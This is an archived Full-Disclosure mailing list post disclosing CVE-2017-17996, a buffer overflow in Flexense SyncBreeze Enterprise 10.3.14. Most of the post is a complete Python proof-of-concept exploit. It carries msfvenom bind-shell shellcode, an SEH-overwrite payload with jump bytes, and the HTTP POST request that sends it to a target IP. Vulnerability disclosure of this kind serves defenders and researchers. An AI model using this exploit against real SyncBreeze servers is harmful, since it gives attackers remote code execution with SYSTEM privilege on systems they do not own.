lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Wed, 31 Jan 2018 02:06:48 -0500 (EST)
From: RYT <me@...ntzj.com>
To: bugtraq@...urityfocus.com, fulldisclosure@...lists.org
Subject: [FD] Flexense SyncBreeze Entreprise 10.3.14 Buffer Overflow
	(SEH-bypass)

Hi List,

Description:

A buffer overflow vulnerability in "Add command" functionality exists in Flexense’s SyncBreeze Enterprise <= 10.3.14. The vulnerability can be triggered by an authenticated attacker who submits more than 5000 characters as the command name. It will cause termination of the SyncBreeze Enterprise server and possibly remote command execution with SYSTEM privilege.

Author:

@ryantzj

www.ryantzj.com

Homepage:

http://http://www.syncbreeze.com/

CVE-ID:

CVE-2017-17996 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17996

CVSSv3 Score:

9.9

CVSSv3 Vector

(/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)

Proof of Concept

#!/usr/bin/python

import socket


buffsize = 5000

#msfvenom -p windows/shell_bind_tcp LPORT=443 EXITFUNC=seh --bad-chars '\x0d\x0a\x00\x27\x22\x08\x09\x1b\x5c\x5f\x25\x26\x3d\x2b'  -f python -v shellcode
shellcode =  ""
shellcode += "\x33\xc9\x83\xe9\xae\xe8\xff\xff\xff\xff\xc0\x5e"
shellcode += "\x81\x76\x0e\x93\xfe\x85\x99\x83\xee\xfc\xe2\xf4"
shellcode += "\x6f\x16\x07\x99\x93\xfe\xe5\x10\x76\xcf\x45\xfd"
shellcode += "\x18\xae\xb5\x12\xc1\xf2\x0e\xcb\x87\x75\xf7\xb1"
shellcode += "\x9c\x49\xcf\xbf\xa2\x01\x29\xa5\xf2\x82\x87\xb5"
shellcode += "\xb3\x3f\x4a\x94\x92\x39\x67\x6b\xc1\xa9\x0e\xcb"
shellcode += "\x83\x75\xcf\xa5\x18\xb2\x94\xe1\x70\xb6\x84\x48"
shellcode += "\xc2\x75\xdc\xb9\x92\x2d\x0e\xd0\x8b\x1d\xbf\xd0"
shellcode += "\x18\xca\x0e\x98\x45\xcf\x7a\x35\x52\x31\x88\x98"
shellcode += "\x54\xc6\x65\xec\x65\xfd\xf8\x61\xa8\x83\xa1\xec"
shellcode += "\x77\xa6\x0e\xc1\xb7\xff\x56\xff\x18\xf2\xce\x12"
shellcode += "\xcb\xe2\x84\x4a\x18\xfa\x0e\x98\x43\x77\xc1\xbd"
shellcode += "\xb7\xa5\xde\xf8\xca\xa4\xd4\x66\x73\xa1\xda\xc3"
shellcode += "\x18\xec\x6e\x14\xce\x96\xb6\xab\x93\xfe\xed\xee"
shellcode += "\xe0\xcc\xda\xcd\xfb\xb2\xf2\xbf\x94\x01\x50\x21"
shellcode += "\x03\xff\x85\x99\xba\x3a\xd1\xc9\xfb\xd7\x05\xf2"
shellcode += "\x93\x01\x50\xf3\x9b\xa7\xd5\x7b\x6e\xbe\xd5\xd9"
shellcode += "\xc3\x96\x6f\x96\x4c\x1e\x7a\x4c\x04\x96\x87\x99"
shellcode += "\x92\x45\x0c\x7f\xf9\xee\xd3\xce\xfb\x3c\x5e\xae"
shellcode += "\xf4\x01\x50\xce\xfb\x49\x6c\xa1\x6c\x01\x50\xce"
shellcode += "\xfb\x8a\x69\xa2\x72\x01\x50\xce\x04\x96\xf0\xf7"
shellcode += "\xde\x9f\x7a\x4c\xfb\x9d\xe8\xfd\x93\x77\x66\xce"
shellcode += "\xc4\xa9\xb4\x6f\xf9\xec\xdc\xcf\x71\x03\xe3\x5e"
shellcode += "\xd7\xda\xb9\x98\x92\x73\xc1\xbd\x83\x38\x85\xdd"
shellcode += "\xc7\xae\xd3\xcf\xc5\xb8\xd3\xd7\xc5\xa8\xd6\xcf"
shellcode += "\xfb\x87\x49\xa6\x15\x01\x50\x10\x73\xb0\xd3\xdf"
shellcode += "\x6c\xce\xed\x91\x14\xe3\xe5\x66\x46\x45\x7b\x97"
shellcode += "\xa1\x14\xed\x3f\x06\x43\x18\x66\x46\xc2\x83\xe5"
shellcode += "\x99\x7e\x7e\x79\xe6\xfb\x3e\xde\x80\x8c\xea\xf3"
shellcode += "\x93\xad\x7a\x4c"


jmp2 = "\xE9\x42\xFE\xFF\xFF"


payload = “A”*(432-len(shellcode)-20) #eip offset at 436
payload += "\x90"*12
payload += shellcode
payload += "\x90"*8
payload += "\x71\x06\x70\x04" #NSEH, a jump net
payload += "\xB1\x41\x01\x10" #SEH
payload += "\x90"
payload += jmp2 #jmp back to shellcode
payload +=“C”*(buffsize) #ends at 83 bytes

buffer ="POST /add_command?sid=c5ecca3e01e7d15b0a490fc197f14395 HTTP/1.1\r\n"
buffer +="Host: 192.168.38.154\r\n"
buffer +="Content-Type: application/x-www-form-urlencoded\r\n"
buffer +="User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_03\r\n"
buffer +=“Content-Length: ”+str(len(payload)+13)+"\r\n\r\n"
buffer +=“command_name=”+payload

print “[*] Sending evil HTTP request to syncbrz”
print “[*] exploited by @ryantzj”
print “[*] Please modify session id and target host to get exploit working”

expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect((“192.168.38.154”,80))
expl.send(buffer)
print expl.recv(1024)
expl.close


Disclosure Timeline

December 29, 2017 1: Vulnerability acquired by ryantzj

December 30, 2017 2: Informed vendor via support@...cbreeze.com

January 31, 2018 3: Exploit published


Regards,

ryantzj

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ